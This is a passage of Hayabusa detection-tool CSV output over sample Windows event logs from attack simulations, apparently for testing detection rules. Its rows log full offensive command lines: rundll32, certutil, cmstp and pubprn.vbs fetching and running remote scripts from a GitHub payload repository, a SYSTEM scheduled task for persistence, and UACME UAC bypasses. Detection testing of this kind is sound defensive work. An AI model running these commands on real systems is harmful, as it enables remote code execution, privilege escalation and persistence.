AllTheThings.dll,EntryPoint : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32 AllTheThings.dll,EntryPoint",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:10.388 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"")",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:11.501 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"")",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:12.352 +09:00,MSEDGEWIN10,3,medium,Rundll32 Internet Connection,,rules/sigma/network_connection/sysmon_rundll32_net_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:15.252 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:20.262 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:25.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:25.269 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf : Path: C:\Windows\System32\cmstp.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,high,Bypass UAC via CMSTP,,rules/sigma/process_creation/win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:30.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:30.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:30.685 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe : Path: C:\Windows\System32\forfiles.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:35.313 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c winrm qc -q : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:35.337 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""} : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:35.347 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:35.838 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript //nologo ""C:\Windows\System32\winrm.vbs"" qc -q : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c winrm qc -q ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:35.878 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript //nologo ""C:\Windows\System32\winrm.vbs"" i c wmicimv2/Win32_Process @{CommandLine=""calc""} : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: calc : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,high,Suspicious Calculator Usage,,rules/sigma/process_creation/win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:40.385 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,Suspicious Calculator Usage,,rules/sigma/process_creation/win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:45.242 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:45.311 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:45.606 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 34 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx -2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx -2019-08-03 18:46:48.924 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: ""C:\Windows\System32\schtasks.exe"" /run /tn ""\Microsoft\Windows\DiskCleanup\SilentCleanup"" /i : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 34",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx -2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""\system32\cleanmgr.exe /autoclean /d C: : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx -2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Disk Cleanup,,rules/sigma/process_creation/win_uac_bypass_cleanmgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx -2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 33 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:14:02.929 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:14:02.934 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:14:07.652 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\fodhelper.exe"" : Path: C:\Windows\System32\fodhelper.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 33",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:14:07.665 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 324 0000028064421EA0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:14:08.065 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\fodhelper.exe"" : Path: C:\Windows\System32\fodhelper.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 33",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\fodhelper.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,high,Bypass UAC via Fodhelper.exe,,rules/sigma/process_creation/win_uac_fodhelper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:14:08.681 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 32 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx -2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx -2019-08-03 19:51:46.647 +09:00,MSEDGEWIN10,11,high,UAC Bypass Using Windows Media Player - File,,rules/sigma/file_event/file_event_uac_bypass_wmp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx -2019-08-03 19:51:46.685 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064421EA0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx -2019-08-03 19:51:47.219 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064425400 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx -2019-08-03 19:51:48.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\windows\system32\cmd.exe ""C:\Program Files\Windows Media Player\osk.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx -2019-08-03 19:51:48.675 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx -2019-08-03 19:51:48.696 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064425400 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx -2019-08-03 19:51:49.371 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: 